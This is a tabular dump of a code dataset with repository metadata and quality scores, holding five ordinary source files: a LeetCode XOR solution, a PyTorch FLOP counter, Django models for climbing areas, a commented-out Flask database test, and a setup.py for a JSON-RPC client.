max_stars_repo_path
stringlengths 4
286
| max_stars_repo_name
stringlengths 5
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.03M
| content_cleaned
stringlengths 6
1.03M
| language
stringclasses 111
values | language_score
float64 0.03
1
| comments
stringlengths 0
556k
| edu_score
float64 0.32
5.03
| edu_int_score
int64 0
5
|
|---|---|---|---|---|---|---|---|---|---|---|
python3/136.single-number.313124299.ac.py
|
Diego-Zulu/leetcode_answers
| 0
|
6628451
|
#
# @lc app=leetcode id=136 lang=python3
#
# [136] Single Number
#
# https://leetcode.com/problems/single-number/description/
#
# algorithms
# Easy (64.86%)
# Likes: 4161
# Dislikes: 154
# Total Accepted: 829.6K
# Total Submissions: 1.3M
# Testcase Example: '[2,2,1]'
#
# Given a non-empty array of integers, every element appears twice except for
# one. Find that single one.
#
# Note:
#
# Your algorithm should have a linear runtime complexity. Could you implement
# it without using extra memory?
#
# Example 1:
#
#
# Input: [2,2,1]
# Output: 1
#
#
# Example 2:
#
#
# Input: [4,1,2,1,2]
# Output: 4
#
#
#
# @lc code=start
# @lc code=start
class Solution:
    def singleNumber(self, nums: list[int]) -> int:
        """Return the element of *nums* that appears exactly once.

        Every other element appears exactly twice, so XOR-folding the
        array cancels the pairs (a ^ a == 0) and leaves the unique
        value.  O(n) time, O(1) extra space, as the problem requires.

        Fix: the original annotation used ``List[int]`` without importing
        ``typing.List``, which raises NameError when the file is run
        standalone; the builtin ``list[int]`` (3.9+) is equivalent.
        """
        acc = 0
        for value in nums:
            acc ^= value  # pairs cancel; the singleton survives
        return acc
# @lc code=end
|
#
# @lc app=leetcode id=136 lang=python3
#
# [136] Single Number
#
# https://leetcode.com/problems/single-number/description/
#
# algorithms
# Easy (64.86%)
# Likes: 4161
# Dislikes: 154
# Total Accepted: 829.6K
# Total Submissions: 1.3M
# Testcase Example: '[2,2,1]'
#
# Given a non-empty array of integers, every element appears twice except for
# one. Find that single one.
#
# Note:
#
# Your algorithm should have a linear runtime complexity. Could you implement
# it without using extra memory?
#
# Example 1:
#
#
# Input: [2,2,1]
# Output: 1
#
#
# Example 2:
#
#
# Input: [4,1,2,1,2]
# Output: 4
#
#
#
# @lc code=start
# @lc code=start
class Solution:
    def singleNumber(self, nums: list[int]) -> int:
        """Return the element of *nums* that appears exactly once.

        Every other element appears exactly twice, so XOR-folding the
        array cancels the pairs (a ^ a == 0) and leaves the unique
        value.  O(n) time, O(1) extra space, as the problem requires.

        Fix: the original annotation used ``List[int]`` without importing
        ``typing.List``, which raises NameError when the file is run
        standalone; the builtin ``list[int]`` (3.9+) is equivalent.
        """
        acc = 0
        for value in nums:
            acc ^= value  # pairs cancel; the singleton survives
        return acc
# @lc code=end
|
en
| 0.705327
|
# # @lc app=leetcode id=136 lang=python3 # # [136] Single Number # # https://leetcode.com/problems/single-number/description/ # # algorithms # Easy (64.86%) # Likes: 4161 # Dislikes: 154 # Total Accepted: 829.6K # Total Submissions: 1.3M # Testcase Example: '[2,2,1]' # # Given a non-empty array of integers, every element appears twice except for # one. Find that single one. # # Note: # # Your algorithm should have a linear runtime complexity. Could you implement # it without using extra memory? # # Example 1: # # # Input: [2,2,1] # Output: 1 # # # Example 2: # # # Input: [4,1,2,1,2] # Output: 4 # # # # @lc code=start # @lc code=end
| 3.402506
| 3
|
NAS/APS-channel-search/utils/compute_flops.py
|
naviocean/SimpleCVReproduction
| 923
|
6628452
|
<reponame>naviocean/SimpleCVReproduction<filename>NAS/APS-channel-search/utils/compute_flops.py
# Code from https://github.com/simochen/model-tools.
import numpy as np
import pdb
import torch
import torchvision
import torch.nn as nn
import numpy as np
import random
def lookup_table_flops(model, candidate_width, alphas=None, input_res=32, multiply_adds=False):
    """Build a per-layer lookup table of conv FLOPs for a channel-search supernet.

    Feature-map sizes are captured by registering forward hooks on every leaf
    BatchNorm2d and running one dummy forward pass; candidate kernel shapes are
    enumerated from ``candidate_width``.

    Returns a list of ``num_conv`` tensors: the first holds
    ``len(candidate_width)`` FLOP entries (first conv, fixed 3-channel input),
    each later one holds ``len(candidate_width) ** 2`` entries, one per
    (c_out, c_in) width combination.

    NOTE(review): ``multiply_adds`` is accepted but never used here — confirm
    whether FLOPs should be doubled when it is True.
    """
    # If the architecture parameters were not passed in, pull them off the model
    # by name ('alphas' in the parameter name).
    if alphas is None:
        for n, v in model.named_parameters():
            if 'alphas' in n:
                alphas = v
    num_conv = alphas.shape[0]
    device = alphas.device
    # obtain the feature map sizes: record the input shape of every 4-D tensor
    # entering a BatchNorm2d during the forward pass below
    list_bn=[]
    def bn_hook(self, input, output):
        if input[0].ndimension() == 4:
            list_bn.append(input[0].shape)
    def foo(net):
        # recursively register the hook on every leaf BatchNorm2d module
        childrens = list(net.children())
        if not childrens:
            if isinstance(net, torch.nn.BatchNorm2d):
                net.register_forward_hook(bn_hook)
            return
        for c in childrens:
            foo(c)
    foo(model)
    input_ = torch.rand(1, 3, input_res, input_res).to(alphas.device)
    input_.requires_grad = True
    # print('alphas:', alphas)
    # print('inputs:', input_)
    # Expose alphas to the model for the forward pass; under DataParallel the
    # real module lives behind `.module`.
    if torch.cuda.device_count() > 1:
        model.module.register_buffer('alphas_tmp', alphas.data)
    else:
        model.register_buffer('alphas_tmp', alphas.data)
    out = model(input_)
    # TODO: only applicable for resnet_20s: 2 convs followed by 1 shortcut
    # Keep only BN shapes belonging to main-branch convs: every third group of
    # num_width**2 hooks after the first layer belongs to a shortcut and is dropped.
    list_main_bn = []
    num_width = len(candidate_width)
    for i, b in enumerate(list_bn):
        if i//num_width == 0 or \
            ((i-num_width)//(num_width**2) >= 0 and ((i-num_width)//(num_width)**2) % 3 != 2):
            list_main_bn.append(b)
    assert len(list_main_bn) == (num_width + num_width ** 2 * (num_conv-1)), 'wrong list of feature map length'
    # start compute flops for each branch
    # first obtain the kernel shapes, a list of length: num_width + num_width**2 * num_conv
    def kernel_shape_types(candidate_width):
        # Enumerate every candidate 3x3 kernel shape; the first layer always
        # has 3 input channels (RGB), later layers pair every (c_out, c_in).
        kshape_types = []
        first_kshape_types = []
        for i in candidate_width:
            first_kshape_types.append((i, 3, 3, 3))
        for i in candidate_width:
            for j in candidate_width:
                kshape_types.append((i, j, 3, 3)) # [co, ci, k, k]
        return kshape_types, first_kshape_types
    kshape_types, first_kshape_types = kernel_shape_types(candidate_width)
    k_shapes = []
    layer_idx = 0
    # One group of candidate kernel shapes per 3x3 conv weight in the model.
    for v in model.parameters():
        if v.ndimension() == 4 and v.shape[2] == 3:
            if layer_idx == 0:
                k_shapes += first_kshape_types
            else:
                k_shapes += kshape_types
            layer_idx += 1
    # compute flops
    flops = [] # a list of length: num_width + num_width**2 * num_conv
    for idx, a_shape in enumerate(list_main_bn):
        # The BN input shape supplies the conv's output spatial size (h, w).
        n, ci, h, w = a_shape
        k_shape = k_shapes[idx]
        co, ci, k, _ = k_shape
        flop = co * ci * k * k * h * w
        flops.append(flop)
    # reshape flops back to list. len == num_conv
    table_flops = []
    table_flops.append(torch.Tensor(flops[:num_width]).to(device))
    for layer_idx in range(num_conv-1):
        tmp = flops[num_width + layer_idx*num_width**2:\
            num_width + (layer_idx+1)*num_width**2]
        assert len(tmp) == num_width ** 2, 'need have %d elements in %d layer'%(num_width**2, layer_idx+1)
        table_flops.append(torch.Tensor(tmp).to(device))
    return table_flops
def print_model_param_nums(model, multiply_adds=False):
    """Print and return the total number of parameters in *model*.

    ``multiply_adds`` is accepted only for signature symmetry with the
    FLOP counter; it is not used here.
    """
    total = 0
    for param in model.parameters():
        total += param.nelement()
    print(' + Number of original params: %.8fM' % (total / 1e6))
    return total
def print_model_param_flops(model, input_res, multiply_adds=False):
    """Print and return the forward-pass FLOPs of *model* for one image.

    Hooks are registered on leaf modules, a dummy batch of 3 RGB images of
    size ``input_res`` is pushed through, and the per-layer counts are summed
    then divided by the batch size.  Only Conv2d and Linear are currently
    counted (BN/ReLU/pool/upsample hooks exist but are commented out).
    With ``multiply_adds`` False a multiply-add counts as one op, else two.

    NOTE(review): the model and input are moved to GPU unconditionally
    (`.cuda()`), so this requires a CUDA device — confirm if CPU support is
    needed.
    """
    prods = {}
    def save_hook(name):
        # Unused helper kept from the original model-tools code.
        def hook_per(self, input, output):
            prods[name] = np.prod(input[0].shape)
        return hook_per
    list_conv=[]
    def conv_hook(self, input, output):
        # FLOPs = (kernel ops per output element + bias) * number of output elements.
        # output[0] is the first sample, so its size() is (C_out, H_out, W_out).
        batch_size, input_channels, input_height, input_width = input[0].size()
        output_channels, output_height, output_width = output[0].size()
        kernel_ops = self.kernel_size[0] * self.kernel_size[1] * (self.in_channels / self.groups)
        bias_ops = 1 if self.bias is not None else 0
        params = output_channels * (kernel_ops + bias_ops)
        flops = (kernel_ops * (2 if multiply_adds else 1) + bias_ops) * output_channels * output_height * output_width * batch_size
        list_conv.append(flops)
    list_linear=[]
    def linear_hook(self, input, output):
        # 2-D input means (batch, features); otherwise treat as batch of 1.
        batch_size = input[0].size(0) if input[0].dim() == 2 else 1
        weight_ops = self.weight.nelement() * (2 if multiply_adds else 1)
        bias_ops = self.bias.nelement() if self.bias is not None else 0
        flops = batch_size * (weight_ops + bias_ops)
        list_linear.append(flops)
    list_bn=[]
    def bn_hook(self, input, output):
        # scale + shift: two ops per element
        list_bn.append(input[0].nelement() * 2)
    list_relu=[]
    def relu_hook(self, input, output):
        list_relu.append(input[0].nelement())
    list_pooling=[]
    def pooling_hook(self, input, output):
        batch_size, input_channels, input_height, input_width = input[0].size()
        output_channels, output_height, output_width = output[0].size()
        kernel_ops = self.kernel_size * self.kernel_size
        bias_ops = 0
        params = 0
        flops = (kernel_ops + bias_ops) * output_channels * output_height * output_width * batch_size
        list_pooling.append(flops)
    list_upsample=[]
    # For bilinear upsample
    def upsample_hook(self, input, output):
        # 12 ops per output element for bilinear interpolation
        batch_size, input_channels, input_height, input_width = input[0].size()
        output_channels, output_height, output_width = output[0].size()
        flops = output_height * output_width * output_channels * batch_size * 12
        list_upsample.append(flops)
    def foo(net):
        # Recursively register counting hooks on leaf modules only.
        childrens = list(net.children())
        if not childrens:
            if isinstance(net, torch.nn.Conv2d):
                net.register_forward_hook(conv_hook)
            if isinstance(net, torch.nn.Linear):
                net.register_forward_hook(linear_hook)
            # if isinstance(net, torch.nn.BatchNorm2d):
            # net.register_forward_hook(bn_hook)
            # if isinstance(net, torch.nn.ReLU):
            # net.register_forward_hook(relu_hook)
            # if isinstance(net, torch.nn.MaxPool2d) or isinstance(net, torch.nn.AvgPool2d):
            # net.register_forward_hook(pooling_hook)
            # if isinstance(net, torch.nn.Upsample):
            # net.register_forward_hook(upsample_hook)
            return
        for c in childrens:
            foo(c)
    model = model.cuda()
    foo(model)
    # Dummy batch of 3; divided back out of the total below.
    input_ = torch.rand(3, 3, input_res, input_res).cuda()
    input_.requires_grad = True
    out = model(input_)
    total_flops = (sum(list_conv) + sum(list_linear) + sum(list_bn) + sum(list_relu) + sum(list_pooling) + sum(list_upsample))
    total_flops /= 3
    print(' + Number of FLOPs of original model: %.8fG' % (total_flops / 1e9))
    # print('list_conv', list_conv)
    # print('list_linear', list_linear)
    # print('list_bn', list_bn)
    # print('list_relu', list_relu)
    # print('list_pooling', list_pooling)
    return total_flops
|
# Code from https://github.com/simochen/model-tools.
import numpy as np
import pdb
import torch
import torchvision
import torch.nn as nn
import numpy as np
import random
def lookup_table_flops(model, candidate_width, alphas=None, input_res=32, multiply_adds=False):
    """Build a per-layer lookup table of conv FLOPs for a channel-search supernet.

    Feature-map sizes are captured by registering forward hooks on every leaf
    BatchNorm2d and running one dummy forward pass; candidate kernel shapes are
    enumerated from ``candidate_width``.

    Returns a list of ``num_conv`` tensors: the first holds
    ``len(candidate_width)`` FLOP entries (first conv, fixed 3-channel input),
    each later one holds ``len(candidate_width) ** 2`` entries, one per
    (c_out, c_in) width combination.

    NOTE(review): ``multiply_adds`` is accepted but never used here — confirm
    whether FLOPs should be doubled when it is True.
    """
    # If the architecture parameters were not passed in, pull them off the model
    # by name ('alphas' in the parameter name).
    if alphas is None:
        for n, v in model.named_parameters():
            if 'alphas' in n:
                alphas = v
    num_conv = alphas.shape[0]
    device = alphas.device
    # obtain the feature map sizes: record the input shape of every 4-D tensor
    # entering a BatchNorm2d during the forward pass below
    list_bn=[]
    def bn_hook(self, input, output):
        if input[0].ndimension() == 4:
            list_bn.append(input[0].shape)
    def foo(net):
        # recursively register the hook on every leaf BatchNorm2d module
        childrens = list(net.children())
        if not childrens:
            if isinstance(net, torch.nn.BatchNorm2d):
                net.register_forward_hook(bn_hook)
            return
        for c in childrens:
            foo(c)
    foo(model)
    input_ = torch.rand(1, 3, input_res, input_res).to(alphas.device)
    input_.requires_grad = True
    # print('alphas:', alphas)
    # print('inputs:', input_)
    # Expose alphas to the model for the forward pass; under DataParallel the
    # real module lives behind `.module`.
    if torch.cuda.device_count() > 1:
        model.module.register_buffer('alphas_tmp', alphas.data)
    else:
        model.register_buffer('alphas_tmp', alphas.data)
    out = model(input_)
    # TODO: only applicable for resnet_20s: 2 convs followed by 1 shortcut
    # Keep only BN shapes belonging to main-branch convs: every third group of
    # num_width**2 hooks after the first layer belongs to a shortcut and is dropped.
    list_main_bn = []
    num_width = len(candidate_width)
    for i, b in enumerate(list_bn):
        if i//num_width == 0 or \
            ((i-num_width)//(num_width**2) >= 0 and ((i-num_width)//(num_width)**2) % 3 != 2):
            list_main_bn.append(b)
    assert len(list_main_bn) == (num_width + num_width ** 2 * (num_conv-1)), 'wrong list of feature map length'
    # start compute flops for each branch
    # first obtain the kernel shapes, a list of length: num_width + num_width**2 * num_conv
    def kernel_shape_types(candidate_width):
        # Enumerate every candidate 3x3 kernel shape; the first layer always
        # has 3 input channels (RGB), later layers pair every (c_out, c_in).
        kshape_types = []
        first_kshape_types = []
        for i in candidate_width:
            first_kshape_types.append((i, 3, 3, 3))
        for i in candidate_width:
            for j in candidate_width:
                kshape_types.append((i, j, 3, 3)) # [co, ci, k, k]
        return kshape_types, first_kshape_types
    kshape_types, first_kshape_types = kernel_shape_types(candidate_width)
    k_shapes = []
    layer_idx = 0
    # One group of candidate kernel shapes per 3x3 conv weight in the model.
    for v in model.parameters():
        if v.ndimension() == 4 and v.shape[2] == 3:
            if layer_idx == 0:
                k_shapes += first_kshape_types
            else:
                k_shapes += kshape_types
            layer_idx += 1
    # compute flops
    flops = [] # a list of length: num_width + num_width**2 * num_conv
    for idx, a_shape in enumerate(list_main_bn):
        # The BN input shape supplies the conv's output spatial size (h, w).
        n, ci, h, w = a_shape
        k_shape = k_shapes[idx]
        co, ci, k, _ = k_shape
        flop = co * ci * k * k * h * w
        flops.append(flop)
    # reshape flops back to list. len == num_conv
    table_flops = []
    table_flops.append(torch.Tensor(flops[:num_width]).to(device))
    for layer_idx in range(num_conv-1):
        tmp = flops[num_width + layer_idx*num_width**2:\
            num_width + (layer_idx+1)*num_width**2]
        assert len(tmp) == num_width ** 2, 'need have %d elements in %d layer'%(num_width**2, layer_idx+1)
        table_flops.append(torch.Tensor(tmp).to(device))
    return table_flops
def print_model_param_nums(model, multiply_adds=False):
    """Print and return the total number of parameters in *model*.

    ``multiply_adds`` is accepted only for signature symmetry with the
    FLOP counter; it is not used here.
    """
    total = 0
    for param in model.parameters():
        total += param.nelement()
    print(' + Number of original params: %.8fM' % (total / 1e6))
    return total
def print_model_param_flops(model, input_res, multiply_adds=False):
    """Print and return the forward-pass FLOPs of *model* for one image.

    Hooks are registered on leaf modules, a dummy batch of 3 RGB images of
    size ``input_res`` is pushed through, and the per-layer counts are summed
    then divided by the batch size.  Only Conv2d and Linear are currently
    counted (BN/ReLU/pool/upsample hooks exist but are commented out).
    With ``multiply_adds`` False a multiply-add counts as one op, else two.

    NOTE(review): the model and input are moved to GPU unconditionally
    (`.cuda()`), so this requires a CUDA device — confirm if CPU support is
    needed.
    """
    prods = {}
    def save_hook(name):
        # Unused helper kept from the original model-tools code.
        def hook_per(self, input, output):
            prods[name] = np.prod(input[0].shape)
        return hook_per
    list_conv=[]
    def conv_hook(self, input, output):
        # FLOPs = (kernel ops per output element + bias) * number of output elements.
        # output[0] is the first sample, so its size() is (C_out, H_out, W_out).
        batch_size, input_channels, input_height, input_width = input[0].size()
        output_channels, output_height, output_width = output[0].size()
        kernel_ops = self.kernel_size[0] * self.kernel_size[1] * (self.in_channels / self.groups)
        bias_ops = 1 if self.bias is not None else 0
        params = output_channels * (kernel_ops + bias_ops)
        flops = (kernel_ops * (2 if multiply_adds else 1) + bias_ops) * output_channels * output_height * output_width * batch_size
        list_conv.append(flops)
    list_linear=[]
    def linear_hook(self, input, output):
        # 2-D input means (batch, features); otherwise treat as batch of 1.
        batch_size = input[0].size(0) if input[0].dim() == 2 else 1
        weight_ops = self.weight.nelement() * (2 if multiply_adds else 1)
        bias_ops = self.bias.nelement() if self.bias is not None else 0
        flops = batch_size * (weight_ops + bias_ops)
        list_linear.append(flops)
    list_bn=[]
    def bn_hook(self, input, output):
        # scale + shift: two ops per element
        list_bn.append(input[0].nelement() * 2)
    list_relu=[]
    def relu_hook(self, input, output):
        list_relu.append(input[0].nelement())
    list_pooling=[]
    def pooling_hook(self, input, output):
        batch_size, input_channels, input_height, input_width = input[0].size()
        output_channels, output_height, output_width = output[0].size()
        kernel_ops = self.kernel_size * self.kernel_size
        bias_ops = 0
        params = 0
        flops = (kernel_ops + bias_ops) * output_channels * output_height * output_width * batch_size
        list_pooling.append(flops)
    list_upsample=[]
    # For bilinear upsample
    def upsample_hook(self, input, output):
        # 12 ops per output element for bilinear interpolation
        batch_size, input_channels, input_height, input_width = input[0].size()
        output_channels, output_height, output_width = output[0].size()
        flops = output_height * output_width * output_channels * batch_size * 12
        list_upsample.append(flops)
    def foo(net):
        # Recursively register counting hooks on leaf modules only.
        childrens = list(net.children())
        if not childrens:
            if isinstance(net, torch.nn.Conv2d):
                net.register_forward_hook(conv_hook)
            if isinstance(net, torch.nn.Linear):
                net.register_forward_hook(linear_hook)
            # if isinstance(net, torch.nn.BatchNorm2d):
            # net.register_forward_hook(bn_hook)
            # if isinstance(net, torch.nn.ReLU):
            # net.register_forward_hook(relu_hook)
            # if isinstance(net, torch.nn.MaxPool2d) or isinstance(net, torch.nn.AvgPool2d):
            # net.register_forward_hook(pooling_hook)
            # if isinstance(net, torch.nn.Upsample):
            # net.register_forward_hook(upsample_hook)
            return
        for c in childrens:
            foo(c)
    model = model.cuda()
    foo(model)
    # Dummy batch of 3; divided back out of the total below.
    input_ = torch.rand(3, 3, input_res, input_res).cuda()
    input_.requires_grad = True
    out = model(input_)
    total_flops = (sum(list_conv) + sum(list_linear) + sum(list_bn) + sum(list_relu) + sum(list_pooling) + sum(list_upsample))
    total_flops /= 3
    print(' + Number of FLOPs of original model: %.8fG' % (total_flops / 1e9))
    # print('list_conv', list_conv)
    # print('list_linear', list_linear)
    # print('list_bn', list_bn)
    # print('list_relu', list_relu)
    # print('list_pooling', list_pooling)
    return total_flops
|
en
| 0.543994
|
# Code from https://github.com/simochen/model-tools. # obtain the feature map sizes # print('alphas:', alphas) # print('inputs:', input_) # TODO: only appliable for resnet_20s: 2 convs followed by 1 shortcut # start compute flops for each branch # first obtain the kernel shapes, a list of length: num_width + num_width**2 * num_conv # [co, ci, k, k] # compute flops # a list of length: num_width + num_width**2 * num_conv # reshape flops back to list. len == num_conv # For bilinear upsample # if isinstance(net, torch.nn.BatchNorm2d): # net.register_forward_hook(bn_hook) # if isinstance(net, torch.nn.ReLU): # net.register_forward_hook(relu_hook) # if isinstance(net, torch.nn.MaxPool2d) or isinstance(net, torch.nn.AvgPool2d): # net.register_forward_hook(pooling_hook) # if isinstance(net, torch.nn.Upsample): # net.register_forward_hook(upsample_hook) # print('list_conv', list_conv) # print('list_linear', list_linear) # print('list_bn', list_bn) # print('list_relu', list_relu) # print('list_pooling', list_pooling)
| 2.173157
| 2
|
areas/models.py
|
chandojo/climbbeta
| 1
|
6628453
|
<gh_stars>1-10
from django.core.validators import validate_image_file_extension
from django.db import models
from django.urls import reverse
from django.utils.text import slugify
from api.vimeo import *
from api.google.geolocator.requests import *
class State(models.Model):
    """A U.S. state grouping climbing areas; the slug is auto-derived from name."""
    name = models.CharField(max_length=200)
    abbrv = models.CharField(max_length=2)  # two-letter postal abbreviation
    slug = models.SlugField(blank=True)
    # Optional image; extension is validated but content is not.
    img = models.ImageField(blank=True, null=True,
        upload_to='areas/media/', validators=[validate_image_file_extension])

    def save(self, *args, **kwargs):
        # Populate the slug from the name on first save only (never overwrite).
        if not self.slug:
            self.slug = slugify(self.name)
        super(State, self).save(*args, **kwargs)

    def get_absolute_url(self):
        # URL pattern name 'states' keyed by slug.
        return reverse('states', kwargs={'slug': self.slug})

    def __str__(self):
        return self.name
class City_Town(models.Model):
    """A city/town within a State; geo fields are filled lazily on first save.

    Fix: ``get_permit`` assigned the undefined name ``null`` (a NameError at
    runtime) where Python's ``None`` was intended.
    """
    name = models.CharField(max_length=200, primary_key=True)
    state = models.ForeignKey(
        State, related_name='cities', on_delete=models.PROTECT)
    slug = models.SlugField(blank=True)
    longitude = models.FloatField(blank=True)
    latitude = models.FloatField(blank=True)
    timezone = models.CharField(max_length=200, blank=True, null=True)
    permit_required = models.NullBooleanField()  # None means "unknown"
    permit_name = models.CharField(max_length=200, null=True, blank=True)
    busted = models.TextField(blank=True, null=True)
    camping = models.NullBooleanField()
    nearby_food = models.NullBooleanField()

    def get_lat(self, **kwargs):
        """Geocode this town's latitude via the geolocator API helper."""
        lat = get_latitude(self, **kwargs)
        return lat

    def get_long(self, **kwargs):
        """Geocode this town's longitude via the geolocator API helper."""
        lng = get_longitude(self, **kwargs)  # renamed: `long` shadowed a builtin name
        return lng

    def get_time(self, **kwargs):
        """Look up this town's timezone via the geolocator API helper."""
        tz = get_timezone(self, **kwargs)
        return tz

    def get_permit(self, **kwargs):
        """Return the permit name, clearing it when no permit is required."""
        if self.permit_required is False:
            # BUG FIX: was `self.permit_name = null` — NameError; use None.
            self.permit_name = None
        return self.permit_name

    def save(self, *args, **kwargs):
        # Fill derived/geocoded fields only when they are missing, so
        # manually-set values are never clobbered.
        if not self.slug:
            self.slug = slugify(self.name)
        if not self.latitude:
            self.latitude = self.get_lat()
        if not self.longitude:
            self.longitude = self.get_long()
        if not self.timezone:
            self.timezone = self.get_time()
        super(City_Town, self).save(*args, **kwargs)

    def get_absolute_url(self):
        # URL pattern 'cities' is keyed by both the town slug and the state slug.
        return reverse('cities', kwargs={'slug': self.slug, 'state_slug': self.state.slug})

    def __str__(self):
        return self.name
|
from django.core.validators import validate_image_file_extension
from django.db import models
from django.urls import reverse
from django.utils.text import slugify
from api.vimeo import *
from api.google.geolocator.requests import *
class State(models.Model):
    """A U.S. state grouping climbing areas; the slug is auto-derived from name."""
    name = models.CharField(max_length=200)
    abbrv = models.CharField(max_length=2)  # two-letter postal abbreviation
    slug = models.SlugField(blank=True)
    # Optional image; extension is validated but content is not.
    img = models.ImageField(blank=True, null=True,
        upload_to='areas/media/', validators=[validate_image_file_extension])

    def save(self, *args, **kwargs):
        # Populate the slug from the name on first save only (never overwrite).
        if not self.slug:
            self.slug = slugify(self.name)
        super(State, self).save(*args, **kwargs)

    def get_absolute_url(self):
        # URL pattern name 'states' keyed by slug.
        return reverse('states', kwargs={'slug': self.slug})

    def __str__(self):
        return self.name
class City_Town(models.Model):
    """A city/town within a State; geo fields are filled lazily on first save.

    Fix: ``get_permit`` assigned the undefined name ``null`` (a NameError at
    runtime) where Python's ``None`` was intended.
    """
    name = models.CharField(max_length=200, primary_key=True)
    state = models.ForeignKey(
        State, related_name='cities', on_delete=models.PROTECT)
    slug = models.SlugField(blank=True)
    longitude = models.FloatField(blank=True)
    latitude = models.FloatField(blank=True)
    timezone = models.CharField(max_length=200, blank=True, null=True)
    permit_required = models.NullBooleanField()  # None means "unknown"
    permit_name = models.CharField(max_length=200, null=True, blank=True)
    busted = models.TextField(blank=True, null=True)
    camping = models.NullBooleanField()
    nearby_food = models.NullBooleanField()

    def get_lat(self, **kwargs):
        """Geocode this town's latitude via the geolocator API helper."""
        lat = get_latitude(self, **kwargs)
        return lat

    def get_long(self, **kwargs):
        """Geocode this town's longitude via the geolocator API helper."""
        lng = get_longitude(self, **kwargs)  # renamed: `long` shadowed a builtin name
        return lng

    def get_time(self, **kwargs):
        """Look up this town's timezone via the geolocator API helper."""
        tz = get_timezone(self, **kwargs)
        return tz

    def get_permit(self, **kwargs):
        """Return the permit name, clearing it when no permit is required."""
        if self.permit_required is False:
            # BUG FIX: was `self.permit_name = null` — NameError; use None.
            self.permit_name = None
        return self.permit_name

    def save(self, *args, **kwargs):
        # Fill derived/geocoded fields only when they are missing, so
        # manually-set values are never clobbered.
        if not self.slug:
            self.slug = slugify(self.name)
        if not self.latitude:
            self.latitude = self.get_lat()
        if not self.longitude:
            self.longitude = self.get_long()
        if not self.timezone:
            self.timezone = self.get_time()
        super(City_Town, self).save(*args, **kwargs)

    def get_absolute_url(self):
        # URL pattern 'cities' is keyed by both the town slug and the state slug.
        return reverse('cities', kwargs={'slug': self.slug, 'state_slug': self.state.slug})

    def __str__(self):
        return self.name
|
none
| 1
| 2.229688
| 2
|
|
test_db.py
|
kai-jinny/Agile-Development-Project
| 2
|
6628454
|
<filename>test_db.py<gh_stars>1-10
# from flask import Flask
# from flask_sqlalchemy import SQLAlchemy
# from sqlalchemy.sql import text
# import os
# basedir = os.path.abspath(os.path.dirname(__file__))
# app = Flask(__name__)
# # change to name of your database; add path if necessary
# db_name = 'app.db'
# app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL') or \
# 'sqlite:///' + os.path.join(basedir, 'app.db')
# app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
# # this variable, db, will be used for all SQLAlchemy commands
# db = SQLAlchemy(app)
# # NOTHING BELOW THIS LINE NEEDS TO CHANGE
# # this route will test the database connection and nothing more
# @app.route('/')
# def testdb():
# try:
# db.session.query(text('1')).from_statement(text('SELECT 1')).all()
# return '<h1>It works.</h1>'
# except Exception as e:
# # e holds description of the error
# error_text = "<p>The error:<br>" + str(e) + "</p>"
# hed = '<h1>Something is broken.</h1>'
# return hed + error_text
# if __name__ == '__main__':
# app.run(debug=True)
#https://python-adv-web-apps.readthedocs.io/en/latest/flask_db1.html
|
<filename>test_db.py<gh_stars>1-10
# from flask import Flask
# from flask_sqlalchemy import SQLAlchemy
# from sqlalchemy.sql import text
# import os
# basedir = os.path.abspath(os.path.dirname(__file__))
# app = Flask(__name__)
# # change to name of your database; add path if necessary
# db_name = 'app.db'
# app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL') or \
# 'sqlite:///' + os.path.join(basedir, 'app.db')
# app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
# # this variable, db, will be used for all SQLAlchemy commands
# db = SQLAlchemy(app)
# # NOTHING BELOW THIS LINE NEEDS TO CHANGE
# # this route will test the database connection and nothing more
# @app.route('/')
# def testdb():
# try:
# db.session.query(text('1')).from_statement(text('SELECT 1')).all()
# return '<h1>It works.</h1>'
# except Exception as e:
# # e holds description of the error
# error_text = "<p>The error:<br>" + str(e) + "</p>"
# hed = '<h1>Something is broken.</h1>'
# return hed + error_text
# if __name__ == '__main__':
# app.run(debug=True)
#https://python-adv-web-apps.readthedocs.io/en/latest/flask_db1.html
|
en
| 0.435376
|
# from flask import Flask # from flask_sqlalchemy import SQLAlchemy # from sqlalchemy.sql import text # import os # basedir = os.path.abspath(os.path.dirname(__file__)) # app = Flask(__name__) # # change to name of your database; add path if necessary # db_name = 'app.db' # app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL') or \ # 'sqlite:///' + os.path.join(basedir, 'app.db') # app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True # # this variable, db, will be used for all SQLAlchemy commands # db = SQLAlchemy(app) # # NOTHING BELOW THIS LINE NEEDS TO CHANGE # # this route will test the database connection and nothing more # @app.route('/') # def testdb(): # try: # db.session.query(text('1')).from_statement(text('SELECT 1')).all() # return '<h1>It works.</h1>' # except Exception as e: # # e holds description of the error # error_text = "<p>The error:<br>" + str(e) + "</p>" # hed = '<h1>Something is broken.</h1>' # return hed + error_text # if __name__ == '__main__': # app.run(debug=True) #https://python-adv-web-apps.readthedocs.io/en/latest/flask_db1.html
| 2.698393
| 3
|
setup.py
|
PulpCattel/jmrpc
| 2
|
6628455
|
<reponame>PulpCattel/jmrpc
from setuptools import setup

# Packaging metadata for the jmrpc JSON-RPC client.
# Fix: description typo "high-livel" -> "high-level" (user-facing PyPI text).
setup(name='jmrpc',
      version='0.1',
      description='A simple and high-level JSON-RPC client library for JoinMarket.',
      url='https://github.com/PulpCattel/jmrpc',
      zip_safe=False,
      packages=['jmrpc'],
      install_requires=['aiohttp[speedups]>=3.7.3', 'schematics>=2.1.1', 'ujson>=4.2.0'],
      python_requires=">=3.7",
      extras_require={
          # Developer tooling: test runner, type checking, linting.
          'dev': ['pytest', 'pytest-asyncio', 'mypy', 'pylint', 'types-requests']})
|
from setuptools import setup

# Packaging metadata for the jmrpc JSON-RPC client.
# Fix: description typo "high-livel" -> "high-level" (user-facing PyPI text).
setup(name='jmrpc',
      version='0.1',
      description='A simple and high-level JSON-RPC client library for JoinMarket.',
      url='https://github.com/PulpCattel/jmrpc',
      zip_safe=False,
      packages=['jmrpc'],
      install_requires=['aiohttp[speedups]>=3.7.3', 'schematics>=2.1.1', 'ujson>=4.2.0'],
      python_requires=">=3.7",
      extras_require={
          # Developer tooling: test runner, type checking, linting.
          'dev': ['pytest', 'pytest-asyncio', 'mypy', 'pylint', 'types-requests']})
|
none
| 1
| 1.254762
| 1
|
|
